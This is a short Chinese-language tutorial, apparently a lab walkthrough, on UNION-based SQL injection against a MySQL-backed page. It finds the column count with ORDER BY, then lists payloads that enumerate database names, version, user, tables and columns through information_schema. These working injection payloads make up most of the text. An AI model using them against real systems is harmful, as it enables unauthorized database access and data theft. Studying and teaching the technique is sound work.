'联合查询'

默认界面

默认语句查询了mysql库 中的user表 里的user字段 的root值
默认页面

这里我们可以顺势查询此字段的长度
order by 100
查询

然后order by 80 逐渐减少
order by 40的时候显示了查询到的数据
所以我们不断缩小值
在49的时候查询到了值,而50没有值
所以断定它的有49个字段名

查询数据库名

union select (select group_concat(schema_name) from information_schema.schemata),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1;

所有数据库名

推荐做法

and 1=2 union select (select group_concat(schema_name) from information_schema.schemata),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19; //或and 0 判定为假,输出为空

所有数据库名

查询版本和数据库及用户

union select version(),database(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1;

信息

查询表名

union select (select group_concat(table_name) from information_schema.tables),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1;

所有表名

查询字段名

union select (select group_concat(column_name) from information_schema.columns),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1;

所有字段名

查询字段内容

字段内容